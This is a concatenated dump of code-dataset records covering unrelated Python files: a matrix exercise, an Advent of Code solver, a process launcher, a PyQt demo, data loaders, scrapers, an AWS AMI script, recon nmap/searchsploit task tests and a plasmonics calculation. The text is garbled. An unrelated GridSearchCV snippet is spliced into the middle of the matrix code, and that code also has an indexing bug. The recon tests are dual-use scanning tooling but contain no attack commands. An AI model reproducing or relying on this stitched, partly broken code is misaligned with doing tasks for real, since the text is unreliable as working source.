int(input(f\"Digite um numero para a posição [{l}, {c}].\\n\"))\nfor l in range(0, 3):\n for c in range(0, 3):\n print(f\"[{matriz[l][c]:^5}]\", end='')\n if matriz[l][c] %2 == 0:\n spar += 
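# The grid search in the Churn_Modelling record above pairs KerasClassifier with
# scikit-learn's GridSearchCV. That wrapper (keras.wrappers.scikit_learn) has been
# removed from recent Keras releases, so here is the same param_grid/cv pattern on
# a plain scikit-learn estimator, which runs with no deep-learning dependency.
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import GridSearchCV

X, y = make_classification(n_samples=200, n_features=11, random_state=0)

# param_grid plays the role of the batch_size/epochs/optimizer grid above
param_grid = {"C": [0.1, 1.0, 10.0],
              "solver": ["lbfgs", "liblinear"]}
search = GridSearchCV(estimator=LogisticRegression(max_iter=1000),
                      param_grid=param_grid,
                      scoring="accuracy",
                      cv=5)
search.fit(X, y)
print(search.best_params_, search.best_score_)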
matriz[l][c]\n print()\nprint(f\"A soma dos valores pares é {spar}.\")\nfor l in range(0, 3):\n scol += matriz[l][2]\nprint(f\"A soma dos valores da 3 coluna é {scol}.\")\nfor c in range(0, 3):\n if c == 0:\n mai = matriz[1][c]\n elif matriz[l][c] > mai:\n mai = matriz[1][c]\nprint(f\"O maior valor da 2 linha é o {mai}.\")\n# Este algoritmo coleta números e os manipula de modo com que forme uma matriz.","sub_path":"Estruturas/Estruturas_compostas/Tuplas_e_listas/Matriz2.py","file_name":"Matriz2.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"217771330","text":"#!/usr/bin/env python3\n\nfrom .input import get_input\nfrom collections import defaultdict\n\nclass Seats:\n def __init__(self, lines):\n self.seats = set()\n for y, line in enumerate(lines):\n line = line.strip()\n for x, c in enumerate(line):\n if c == 'L':\n self.seats.add(x + y*1j)\n xm, ym = x + 1, y + 1\n\n self.adjacent = {}\n self.adjacent_view = {}\n directions = [1, 1+1j, 1j, -1+1j, -1, -1 - 1j, -1j, 1-1j]\n for x in range(xm):\n for y in range(ym):\n pos = x + y*1j\n if pos not in self.seats:\n continue\n self.adjacent[pos] = [pos + d for d in directions\n if pos + d in self.seats]\n def in_view(d):\n kpos = pos + d\n while 0 <= kpos.real < xm and 0 <= kpos.imag < ym:\n if kpos in self.seats:\n return kpos\n kpos += d\n av = []\n for d in directions:\n kpos = in_view(d)\n if kpos:\n av.append(kpos)\n self.adjacent_view[pos] = av\n\n def stabilize(self, adjacent, N):\n state = defaultdict(bool)\n while True:\n def change(s):\n occupied = state[s]\n if occupied:\n return sum(state[a] for a in adjacent[s]) >= N\n else:\n return not any(state[a] for a in adjacent[s])\n to_change = [s for s in self.seats if change(s)]\n if not to_change:\n return state\n for c in to_change:\n state[c] = not state[c]\n\ndef test(args):\n seats = Seats(\"\"\"L.LL.LL.LL\nLLLLLLL.LL\nL.L.L..L..\nLLLL.LL.LL\nL.LL.LL.LL\nL.LLLLL.LL\n..L.L.....\nLLLLLLLLLL\nL.LLLLLL.L\nL.LLLLL.LL\"\"\".split('\\n'))\n print(sum(seats.stabilize(seats.adjacent, 4).values()))\n print(sum(seats.stabilize(seats.adjacent_view, 5).values()))\n print('Tests passed')\n\ndef main(args):\n seats = Seats(get_input(args.YEAR, args.DAY))\n print(sum(seats.stabilize(seats.adjacent, 4).values()))\n print(sum(seats.stabilize(seats.adjacent_view, 5).values()))\n\n\n","sub_path":"lib/aoc/year_2020_day_11.py","file_name":"year_2020_day_11.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"538901034","text":"# Main File\n# ----------------\n#\n# The program will start here.\n# This file will only initialize and start the processes.\n\nfrom sys import version_info\nimport sys\n\nif version_info < (3, 6):\n sys.exit(\"Error: MLSC requires Python 3.6 or greater.\")\n\nfrom libs.audio_process_service import AudioProcessService\nfrom libs.notification_service import NotificationService\nfrom libs.device_manager import DeviceManager\nfrom libs.config_service import ConfigService\nfrom libs.webserver import Webserver\n\nfrom multiprocessing import Process, Queue, Lock\nfrom time import sleep\nimport logging\n\n\nclass Main():\n \"\"\"\n This is the main class. 
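# In the Matriz2.py record above, the loop that looks for the maximum of row 2
# compares against matriz[l][c] with l left over from an earlier loop, so the
# wrong row can be inspected. A short sketch of the intended logic (second row's
# maximum, plus the even-value sum and third-column sum) on a sample 3x3 matrix:
matriz = [[1, 8, 3],
          [4, 9, 6],
          [7, 2, 5]]

spar = sum(v for row in matriz for v in row if v % 2 == 0)  # sum of even values
scol = sum(row[2] for row in matriz)                        # sum of column 3
mai = max(matriz[1])                                        # maximum of row 2
print(spar, scol, mai)  # -> 20, 14, 9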
It controls everything.\n It's the first starting point of the program.\n \"\"\"\n def start(self):\n \"\"\"\n This function will start all necessary components.\n Let's go :-D\n \"\"\"\n # We need a lock to prevent too fast saving and loading actions of the config\n self._config_lock = Lock()\n\n # Create the instance of the config\n self._config_instance = ConfigService.instance(self._config_lock)\n self._config = self._config_instance.config\n\n self.logger = logging.getLogger(__name__)\n self.logger.info(\"Initializing MLSC...\")\n\n # Check config compatibility\n self._config_instance.check_compatibility()\n\n # Prepare the queue for the output\n self._output_queue = Queue(2)\n self._effects_queue = Queue(100)\n self._audio_queue = Queue(2)\n\n # Prepare all notification queues\n self._notification_queue_audio_in = Queue(100)\n self._notification_queue_audio_out = Queue(100)\n\n self._notification_queue_device_manager_in = Queue(100)\n self._notification_queue_device_manager_out = Queue(100)\n\n self._notification_queue_webserver_in = Queue(100)\n self._notification_queue_webserver_out = Queue(100)\n\n # Start the DeviceManager Service\n self._device_manager = DeviceManager()\n self._device_manager_process = Process(\n target=self._device_manager.start,\n args=(\n self._config_lock,\n self._notification_queue_device_manager_in,\n self._notification_queue_device_manager_out,\n self._effects_queue,\n self._audio_queue,\n ))\n self._device_manager_process.start()\n\n # Start Notification Service\n self._notification_service = NotificationService()\n self._notification_service_process = Process(\n target=self._notification_service.start,\n args=(\n self._config_lock,\n self._notification_queue_device_manager_in,\n self._notification_queue_device_manager_out,\n self._notification_queue_audio_in,\n self._notification_queue_audio_out,\n self._notification_queue_webserver_in,\n self._notification_queue_webserver_out,\n ))\n self._notification_service_process.start()\n\n # Start Webserver\n self._webserver = Webserver()\n self._webserver_process = Process(\n target=self._webserver.start,\n args=(\n self._config_lock,\n self._notification_queue_webserver_in,\n self._notification_queue_webserver_out,\n self._effects_queue\n ))\n self._webserver_process.start()\n\n # Start audio process\n self._audio = AudioProcessService()\n self._audio_process = Process(\n target=self._audio.start,\n args=(\n self._config_lock,\n self._notification_queue_audio_in,\n self._notification_queue_audio_out,\n self._audio_queue\n ))\n self._audio_process.start()\n\n self.logger.info(\"Initialization finished.\")\n\n try:\n self.logger.info(\"MLSC started...\")\n\n self._cancel_token = False\n\n # Do nothing with this thread. 
Just wait for the exit.\n while not self._cancel_token:\n sleep(10)\n\n except KeyboardInterrupt:\n self.logger.info(\"Stopping MLSC...\")\n self._notification_service_process.terminate()\n self._webserver_process.terminate()\n self.logger.info(\"MLSC stopped\")\n\n\nif __name__ == \"__main__\":\n\n # logging.basicConfig(handlers=[\n # RotatingFileHandler(logging_path + logging_file, mode='a', maxBytes=5 * 1024 * 1024, backupCount=5, encoding='utf-8'),\n # logging.StreamHandler()\n # ],\n # format='%(asctime)s - %(levelname)-8s - %(name)-15s - %(message)s',\n # datefmt='%Y.%m.%d %H:%M:%S',\n # level=logging.DEBUG\n # )\n\n main = Main()\n main.start()\n","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"24980836","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import uic\nfrom Cython.Compiler.Naming import self_cname\nimport string\n\nform_class = uic.loadUiType(\"myqt05.ui\")[0]\n\nclass MyWindow(QMainWindow, form_class):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.pb.clicked.connect(self.myclick)\n \n def myclick(self):\n hello = \"\\nhello\"\n # obj = QTextEdit(self.te())\n # obj.text\n # TextEdit는 toplainText를 받으면서 감.\n hello1 = self.te.toPlainText()\n \n self.te.setText(hello1 + hello)\n \nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n myWindow = MyWindow()\n myWindow.show()\n app.exec_()","sub_path":"HELLOPYTHON/day04/myqt05.py","file_name":"myqt05.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"278215683","text":"import os\nimport argparse\nimport pickle\n\nimport numpy as np\n\nfrom motornn.utils.predict_utils import (load_model, load_data,\n predict, compute_metrics,\n generate)\n\n\ndef get_arg_parse():\n parser = argparse.ArgumentParser(description='Test on custom benchmark.')\n parser.add_argument('--speed_model_file', required=True, type=str)\n parser.add_argument('--torque_model_file', required=True, type=str)\n parser.add_argument('--window', type=int,\n required=True, help='input window')\n parser.add_argument('--save_file', type=str, required=True,\n help='output filepath')\n args = parser.parse_args()\n return args\n\n\nargs = get_arg_parse()\nspeed_model, torque_model = load_model(args)\n\nramp_overshoot = []\n\nfor ramp in np.arange(0.004, 2.5, 0.004):\n try:\n reference_speed = [0, 0, 50, 50]\n speed_time = [0, 1, 1+ramp, 5]\n reference_torque = [0, 0, 0, 0]\n torque_time = [0, 1, 1+ramp, 5]\n sim_rate = 0.004\n data = generate(reference_speed, speed_time,\n reference_torque, torque_time,\n sim_rate)\n\n speed_denormed, torque_denormed, speed_ml_metrics, torque_ml_metrics = \\\n predict(speed_model, torque_model, data, args.window)\n\n # print('Speed ML Metrics', speed_ml_metrics)\n # print('Torque ML Metrics', torque_ml_metrics)\n ee_metrics = compute_metrics(data, speed_denormed, torque_denormed, 'speed')\n\n # print('Quantity', 'Simulation', 'Model')\n # print('2% time', ee_metrics['perc2_times'][0],\n # ee_metrics['model_perc2_times'][0])\n # print('95% time', ee_metrics['perc95_times'][0],\n # ee_metrics['model_perc95_times'][0])\n # print('Overshoot', ee_metrics['overshoot_errs'][0],\n # ee_metrics['model_overshoot_errs'][0])\n # print('Following Error', ee_metrics['following_errs'][0],\n # ee_metrics['model_following_errs'][0])\n # print('Steady State Error', 
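# A stripped-down version of the process wiring used by the MLSC Main class
# above: each service runs in its own multiprocessing.Process and communicates
# over bounded Queues, and the parent idles until interrupted, then terminates
# its children. This is a sketch of the pattern, not the MLSC services themselves.
from multiprocessing import Process, Queue

def worker(inbox, outbox):
    while True:
        item = inbox.get()            # blocks until the parent sends work
        outbox.put(item * 2)

if __name__ == "__main__":
    inbox, outbox = Queue(100), Queue(100)
    p = Process(target=worker, args=(inbox, outbox))
    p.start()
    try:
        inbox.put(21)
        print(outbox.get(timeout=5))  # -> 42
    except KeyboardInterrupt:
        pass                          # MLSC waits here until Ctrl+C
    finally:
        p.terminate()                 # mirrors the shutdown path above
        p.join()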
ee_metrics['sse_errs'][0],\n # ee_metrics['model_sse_errs'][0])\n # print('Max Acc Torque', ee_metrics['max_trq_accs'][0],\n # ee_metrics['model_max_trq_accs'][0])\n\n ramp_overshoot.append([ramp, ee_metrics, speed_ml_metrics, torque_ml_metrics])\n\n print(ramp, ee_metrics['overshoot_errs'][0],\n ee_metrics['model_overshoot_errs'][0])\n\n # if not os.path.exists(args.save_dir):\n # os.makedirs(args.save_dir)\n #\n # fout = open(os.path.join(args.save_dir,\n # args.speed_model_file.split('/')[-1].replace('.pt',\n # str(ramp) + '.pkl')), 'wb')\n # pickle.dump([speed_denormed, torque_denormed], fout)\n # fout.close()\n except:\n pass\n\nfout = open(args.save_file, 'wb')\npickle.dump(ramp_overshoot, fout)\nfout.close()\n","sub_path":"motornn/predict_batch.py","file_name":"predict_batch.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"358852780","text":"import json\nimport xml.dom.minidom\nfrom model import Author\n\n\nclass json_loader(object):\n\n @staticmethod\n def parse_loaded_dict(loaded_dict):\n return Author(name=loaded_dict['name'],\n country=loaded_dict['country'],\n years='-'.join(map(str, loaded_dict['years']))\n if len(loaded_dict['years']) > 1\n else ''.join(loaded_dict['years']))\n\n @staticmethod\n def load(string):\n loaded = json.loads(string)\n if isinstance(loaded, list):\n return [json_loader.parse_loaded_dict(item) for item in loaded]\n else:\n return [json_loader.parse_loaded_dict(loaded)]\n\n @staticmethod\n def dump(author):\n return json.dumps({'name': author.name,\n 'country': author.country,\n 'years': author.years.split('-')})\n\n\nclass xml_loader(object):\n\n @staticmethod\n def load(string):\n parsed = xml.dom.minidom.parseString(string)\n author = parsed.getElementsByTagName('author')[0]\n name = author.getElementsByTagName('name')[0].firstChild.data\n country = author.getElementsByTagName('country')[0].firstChild.data\n years = author.getElementsByTagName('years')[0]\n return [Author(name=name,\n country=country,\n years='-'.join((years.attributes['born'].value,\n years.attributes['died'].value)))]\n\n @staticmethod\n def dump(author):\n try:\n document = xml.dom.minidom.Document()\n dom_author = document.createElement('author')\n dom_name = document.createElement('name')\n dom_name.appendChild(document.createTextNode(author.name))\n dom_author.appendChild(dom_name)\n dom_country = document.createElement('country')\n dom_country.data = author.country\n dom_country.appendChild(document.createTextNode(author.country))\n dom_author.appendChild(dom_country)\n dom_years = document.createElement('years')\n years = author.years.split('-')\n if len(years) < 2:\n years.append('')\n (dom_years.attributes['born'],\n dom_years.attributes['died']) = years\n dom_author.appendChild(dom_years)\n document.appendChild(dom_author)\n return document.toprettyxml()\n except BaseException as e:\n print(e)\n raise\n","sub_path":"Laba4/3/loaders.py","file_name":"loaders.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"69543681","text":"from bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport time\nimport datetime\nimport pytz\nfrom sqlalchemy import create_engine, MetaData, Table\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nimport re\nimport requests\nfrom requests.exceptions import HTTPError\n\n# class RateScraper():\n#\n# def 
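# The loaders record above converts between an Author model and JSON/XML. A
# self-contained sketch of the JSON direction, using a dataclass as a stand-in
# for the record's model.Author (the years field round-trips through a
# '-'-joined string, exactly as in json_loader):
import json
from dataclasses import dataclass

@dataclass
class Author:
    name: str
    country: str
    years: str            # e.g. "1828-1910"

def dump(author):
    return json.dumps({"name": author.name,
                       "country": author.country,
                       "years": author.years.split("-")})

def load(text):
    d = json.loads(text)
    return Author(d["name"], d["country"], "-".join(map(str, d["years"])))

a = Author("Leo Tolstoy", "Russia", "1828-1910")
assert load(dump(a)) == a   # lossless round trip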
get_html(self):\n#\n# chrome_options = webdriver.ChromeOptions()\n# chrome_options.add_argument('--no-sandbox')\n# chrome_options.add_argument('--headless')\n# chrome_options.add_argument('--disable-gpu')\n# driver = webdriver.Chrome(chrome_options=chrome_options)\n# driver.get(settings.STOCK_URL)\n# time.sleep(5)\n# html = driver.page_source\n# driver.close()\n# return html\n#\n# def scrape_rates(self):\n# data = {}\n# data['date'] = datetime.datetime.utcnow().replace(tzinfo=pytz.utc)\n# html = self.get_html()\n# soup = BeautifulSoup(html, 'html.parser')\n# div_main = soup.find('div', 'containerCenter')\n# tbody = div_main.find('tbody')\n# rows = tbody.find_all('tr')\n# for row in rows:\n# tds = row.find_all('td')\n# curr_name = tds[0].find('a').text.lstrip().rstrip()\n# if re.search('/BYN_TOD3', curr_name):\n# curr_name = curr_name.replace('/BYN_TOD3','')\n# else:\n# curr_name = curr_name.replace('/BYN_TOD', '')\n# curr_rate = tds[1].text\n# data[curr_name] = curr_rate\n#\n# return data\n#\n# @classmethod\n# def put_to_db(cls, data):\n# engine = create_engine(settings.CONN_STR)\n# Base = automap_base()\n# Base.prepare(engine, reflect=True)\n# Currency = Base.classes.rates_currency\n# Rate = Base.classes.rates_rate\n# session = Session(engine)\n# date = data['date']\n# del data['date']\n# for k, v in data.items():\n# if session.query(Currency).filter(Currency.short == k).scalar():\n# currency = session.query(Currency).filter(Currency.short == k).one()\n# if re.match(r'^\\d+,\\d+', v):\n# r = v.replace(',','.')\n# try:\n# r= float(r)\n# rate = Rate(rate=float(r), currency_id=currency.id, date_time = date)\n# session.add(rate)\n# session.commit()\n# session.flush()\n# except ValueError:\n# pass\n#\n\nDAY_TYPES = {\n 'Рабочий день': 1,\n 'Выходной день': 0\n}\n\nclass CheckBYHolidays:\n\n @classmethod\n def get_calendar_page(cls, url):\n r = requests.get(url)\n if r.status_code == 200:\n return r.content\n else:\n raise HTTPError(r.status_code)\n\n @classmethod\n def is_today_workday(cls, url_to_check):\n url = url_to_check\n html = CheckBYHolidays.get_calendar_page(url)\n soup = BeautifulSoup(html, 'html.parser')\n div_content = soup.find('div','content')\n content = div_content.find(lambda tag:tag.name == \"font\" and\n len(tag.attrs) == 1 and\n tag[\"size\"] == \"+1\").text\n for k,v in DAY_TYPES.items():\n try:\n if re.search(k, content):\n return bool(v)\n except Exception as e:\n print(e)\n\n","sub_path":"rate_scraper/app/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"244986028","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ny_heatintg_all = []\r\nx_heatintg_all = []\r\ny_cooling_all = []\r\nx_cooling_all = []\r\n\r\nwith open(\"../data/heating_all.txt\", \"r\") as f:\r\n searchlines = f.readlines()\r\nfor line in searchlines:\r\n\tlist_of_data = line.split()\r\n\ty_heatintg_all.append( float(list_of_data[2]) )\r\n\tx_heatintg_all.append( int(list_of_data[0]) )\r\n\r\nwith open(\"../data/cooling_all.txt\", \"r\") as f:\r\n searchlines = f.readlines()\r\nfor line in searchlines:\r\n\tlist_of_data = line.split()\r\n\ty_cooling_all.append( float(list_of_data[2]) )\r\n\tx_cooling_all.append( int(list_of_data[0]) )\r\n\r\n\r\n\r\n \r\nplt.plot(x_heatintg_all, y_heatintg_all, label = \"Heating\", marker = \".\")\r\nplt.plot(x_cooling_all, y_cooling_all, label = \"Cooling\", marker = \"v\")\r\nplt.ylabel(\"1/U [1/V]\")\r\nplt.xlabel(\"T 
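# The CheckBYHolidays class above fetches a calendar page and searches its text
# against the DAY_TYPES mapping ("Рабочий день" = working day, "Выходной день" =
# day off). A compact sketch of the same fetch-and-match flow; the URL is left
# as a caller-supplied placeholder and raise_for_status() replaces the manual
# status_code check:
import re
import requests
from bs4 import BeautifulSoup

DAY_TYPES = {"Рабочий день": True, "Выходной день": False}

def is_workday(url):
    r = requests.get(url, timeout=10)
    r.raise_for_status()                      # raises HTTPError on non-2xx
    text = BeautifulSoup(r.content, "html.parser").get_text()
    for phrase, is_working in DAY_TYPES.items():
        if re.search(phrase, text):
            return is_working
    return None                               # page didn't say either way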
[°C]\")\r\nplt.legend()\r\nplt.minorticks_on()\r\n\r\nplt.savefig(\"../result/chart_1\")","sub_path":"lab_20/src/generate_chart_1.py","file_name":"generate_chart_1.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"535235777","text":"# from common.Cloudscale import *\nimport boto.ec2\nimport time\nimport sys\nfrom cloudscale.deployment_scripts.config import AWSConfig\nfrom cloudscale.deployment_scripts.scripts import check_args, get_cfg_logger\n\nclass EC2CreateAMI:\n\n def __init__(self, config, logger):\n self.config = config\n self.logger = logger\n self.conn = boto.ec2.connect_to_region(self.config.region,\n aws_access_key_id=self.config.access_key,\n aws_secret_access_key=self.config.secret_key)\n\n ami_id = self.create_ami(self.config.cfg.get('infrastructure', 'ip_address'))\n self.config.config.save('infrastructure', 'ami_id', ami_id)\n self.logger.log(\"Done\")\n\n def create_ami(self, instance_ip):\n self.logger.log(\"Creating AMI from instance %s\" % instance_ip)\n if instance_ip is None:\n self.logger.log(\"instance_ip is null\")\n exit(0)\n\n instance_id = None\n for instance in self.conn.get_only_instances():\n if instance.ip_address == instance_ip:\n instance_id = instance.id\n break\n\n if instance_id is None:\n self.logger.log(\"Can't find any instances to create ami from!\")\n exit(0)\n try:\n image_id = self.conn.create_image(instance_id, 'cloudscale-as-image')\n self.wait_available(image_id)\n self.terminate_instance(instance_id)\n return image_id\n except boto.exception.EC2ResponseError as e:\n if str(e.error_code) == 'InvalidAMIName.Duplicate':\n image = self.conn.get_all_images(filters={'name' : 'cloudscale-as-image'})[0]\n image.deregister()\n return self.create_ami(instance_ip)\n self.logger.log(\"Error creating AMI image\")\n exit(0)\n\n def terminate_instance(self, instance_id):\n self.conn.terminate_instances([instance_id])\n self.wait_terminate(instance_id)\n\n def wait_available(self, image_id):\n self.logger.log(\"Waiting to create AMI from instance ..\")\n status = self.conn.get_all_images(image_ids=[image_id])[0].state\n i=1\n while status != 'available':\n if i%10 == 0:\n self.logger.log(\"\\nPlease wait .\")\n self.logger.log(\".\", append_to_last=True)\n status = self.conn.get_all_images(image_ids=[image_id])[0].state\n time.sleep(3)\n i=i+1\n\n self.logger.log(\"Done\")\n\n def wait_terminate(self, instance_id):\n self.logger.log(\"Waiting for instance to terminate\\nPlease wait ..\")\n status = self.conn.get_all_instances([instance_id])[0].instances[0].state\n i=1\n while status != 'terminated':\n if i%10 == 0:\n self.logger.log(\"\\nPlease wait .\")\n self.logger.log(\".\", append_to_last=True)\n status = self.conn.get_all_instances([instance_id])[0].instances[0].state\n time.sleep(3)\n i=i+1\n\n self.logger.log(\"Instance is terminated!\")\n\nif __name__ == \"__main__\":\n check_args(2, \" \")\n user_path, cfg, logger = get_cfg_logger(sys.argv[1], sys.argv[2])\n EC2CreateAMI(cfg, logger)\n\n\n","sub_path":"cloudscale/deployment_scripts/scripts/infrastructure/aws/aws_create_ami.py","file_name":"aws_create_ami.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"3746180","text":"# Copyright (C) Ivan Kravets \n# See LICENSE for details.\n\nfrom platformio.platforms.base import BasePlatform\nfrom platformio.util import get_systype\n\n\nclass 
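# aws_create_ami.py above polls EC2 image and instance state in hand-rolled
# while loops. A generic poll-until helper captures that pattern and is testable
# without AWS credentials; the fake_status closure below simply simulates a
# resource that becomes 'available' on the third check.
import time

def wait_for(get_status, target, interval=3, timeout=60):
    """Poll get_status() every `interval` seconds until it returns `target`."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        if get_status() == target:
            return True
        time.sleep(interval)
    return False                      # time out instead of looping forever

states = iter(["pending", "pending", "available"])
fake_status = lambda: next(states)
print(wait_for(fake_status, "available", interval=0))   # -> True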
Linux_armPlatform(BasePlatform):\n\n \"\"\"\n Linux ARM is a Unix-like and mostly POSIX-compliant computer\n operating system (OS) assembled under the model of free and open-source\n software development and distribution.\n\n Using host OS (Mac OS X, Linux ARM) you can build native application\n for Linux ARM platform.\n\n http://platformio.org/#!/platforms/linux_arm\n \"\"\"\n\n PACKAGES = {\n\n \"toolchain-gccarmlinuxgnueabi\": {\n \"alias\": \"toolchain\",\n \"default\": True\n }\n }\n\n def __init__(self):\n if \"linux_arm\" in get_systype():\n del self.PACKAGES['toolchain-gccarmlinuxgnueabi']\n BasePlatform.__init__(self)\n","sub_path":"platformio/platforms/linux_arm.py","file_name":"linux_arm.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"526256025","text":"from pathlib import Path\nfrom recon.nmap import ThreadedNmapScan, SearchsploitScan\n\nimport luigi\n\nfrom ..utils import is_kali\n\ntfp = \"../data/bitdiscovery\"\ntf = Path(tfp).stem\nel = \"../data/blacklist\"\nrd = \"../data/recon-results\"\n\nnmap_results = Path(__file__).parent.parent / \"data\" / \"recon-results\" / \"nmap-results\"\n\n\ndef test_nmap_output_location(tmp_path):\n tns = ThreadedNmapScan(target_file=tf, exempt_list=el, results_dir=str(tmp_path), top_ports=100)\n\n assert tns.output().path == str(Path(tmp_path) / \"nmap-results\")\n\n\ndef test_searchsploit_output_location(tmp_path):\n sss = SearchsploitScan(target_file=tf, exempt_list=el, results_dir=str(tmp_path), top_ports=100)\n\n assert sss.output().path == str(Path(tmp_path) / \"searchsploit-results\")\n\n\ndef test_searchsploit_produces_results(tmp_path):\n sss = SearchsploitScan(target_file=tf, exempt_list=el, results_dir=str(tmp_path), top_ports=100)\n\n sss.input = lambda: luigi.LocalTarget(nmap_results)\n\n if not is_kali():\n return True\n\n sss.run()\n\n assert len([x for x in Path(sss.output().path).glob(\"searchsploit*.txt\")]) > 0\n","sub_path":"tests/test_recon/test_nmap.py","file_name":"test_nmap.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"333393616","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n dummy = ListNode(0)\n dummy.next = head\n prev = dummy\n tail = dummy\n while n > 0:\n tail = tail.next\n n -= 1\n\n while tail.next:\n prev = prev.next\n tail = tail.next\n\n prev.next = prev.next.next\n\n return dummy.next\n\n\nhead = ListNode(1)\nprev = head\na = 4\nb = 2\nwhile a > 0:\n prev.next = ListNode(b)\n prev = prev.next\n b += 1\n a -= 1\n\ns = Solution()\nresult = s.removeNthFromEnd(head, 2)\nprint(result)\n\ns.removeNthFromEnd(ListNode(1), 1)\n","sub_path":"leetcode_python/19. 删除链表的倒数第N个节点.py","file_name":"19. 删除链表的倒数第N个节点.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"441798261","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 10 13:15:55 2016\n@author: Brian Appleton\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\n\npi = np.pi\n\n#%% Problem 1 Part A\n#Plot the dielectric response of gold using eqn. 
(2)\n\n#Given:\nn_water = 1.33\ne_water = 1.33*1.33\nparticle_diameter = 10e-9\n#(note that I'll use 'e' in place of epsilon)\n\n#Given constants for eqn. (2)\nc1 = 12.53 #epsilon_inf\nc2 = 133e-9 #lambda_p\nc3 = 12000e-9 #lambda_gamma\n\n#Define array for wavelength. 0.1nm resolution.\n#wavelength = np.linspace(290e-9, 1010e-9, 7201)\nwavelength = np.linspace(90e-9, 1010e-9, 9201)\n\n#Calculate the complex relative dielectric constant using the given eqn. (2)\ne_r = c1 - 1/c2**2 / (1/wavelength**2 + 1j/(c3*wavelength))\n\nresonant_e_r = -2*e_water\n\n#Find the index of the element in e_r whose value matches the resonant e_r\nresonant_index = np.abs(np.real(e_r)-resonant_e_r).argmin()\nresonant_wavelength = wavelength[resonant_index]\nprint(resonant_wavelength*1e9, \"nm found at Re{e_r} = \", np.real(e_r[resonant_index]))\n\n\nplt.plot(wavelength*1e9, np.real(e_r), label=\"$\\epsilon'$\")\nplt.plot(wavelength*1e9, np.imag(e_r), label=\"$\\epsilon''$\", linestyle='--')\nplt.plot(resonant_wavelength*1e9, resonant_e_r, marker='.', markersize=10)\nax = plt.subplot(111)\nplt.suptitle(\"Dielectric response for Au\", fontsize = 18)\nplt.xlabel(\"Wavelength, nm\", fontsize=14)\nplt.ylabel(\"Relative dielectric constant\", fontsize= 14)\nplt.legend(fontsize = 20, loc = 'best')\nplt.grid(True)\nax.set_xlim(xmin=395, xmax=705)\nplt.savefig('prob1_parta.png', dpi=200)\n\n\n#%% Problem 1 Part B\n#Plot the scattering and absorption cross-sections for the 10nm diameter Au NPs. Use the result to find the resonance condition.\n\nplt.clf()\nplt.cla()\nplt.close()\n\n#Particle radius\nR = 10e-9/2\n\n#Grab the real and imaginary parts of the dielectric response for gold that we calculated in Part A\ner_re = np.real(e_r)\ner_im = np.imag(e_r)\n\n#Calculate the scattering cross-section using eqn. (17)\nsigma_sca = (8*pi/3)*((2*pi/wavelength)**4)*(R**6)*(((er_re-e_water)**2+er_im**2)/((er_re+2*e_water)**2+er_im**2))**2\npeak_sca_wavelength = wavelength[sigma_sca.argmax()]\nprint(\"The peak scattering cross-section occurs at wavelength \", peak_sca_wavelength*1e9, \" nm.\")\n\n#Calculate the absorption cross-section using eqn. (19)\nsigma_abs = (4*pi*2*pi/wavelength*R**3)*((er_im*e_water)/((er_re+2*e_water)**2+er_im**2))\npeak_abs_wavelength = wavelength[sigma_abs.argmax()]\nprint(\"The peak absorption cross-section occurs at wavelength \", peak_abs_wavelength*1e9, \" nm.\")\n\n#Calculate the extinction cross-section using eqn. (14)\nsigma_ext = sigma_sca+sigma_abs\n\n#Find the resonant wavelength, as the wavelength that maximizes sigma_ext\nresonant_index = np.argmax(sigma_ext)\nprint(\"Resonant wavelength of sigma_ext is \", wavelength[resonant_index]*1e9, \" nm. 
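# The Frohlich condition used above, resonance where Re{eps_r} = -2*eps_m, can be
# isolated into a few lines. This re-evaluates the record's eqn (2) Drude fit for
# gold and locates the sampled wavelength closest to resonance in water
# (eps_m = 1.33**2), using the same c1/c2/c3 constants as the record:
import numpy as np

eps_inf, lam_p, lam_g = 12.53, 133e-9, 12000e-9   # c1, c2, c3 from above
eps_m = 1.33 ** 2                                 # water
lam = np.linspace(400e-9, 800e-9, 4001)

eps_r = eps_inf - 1 / lam_p**2 / (1 / lam**2 + 1j / (lam_g * lam))
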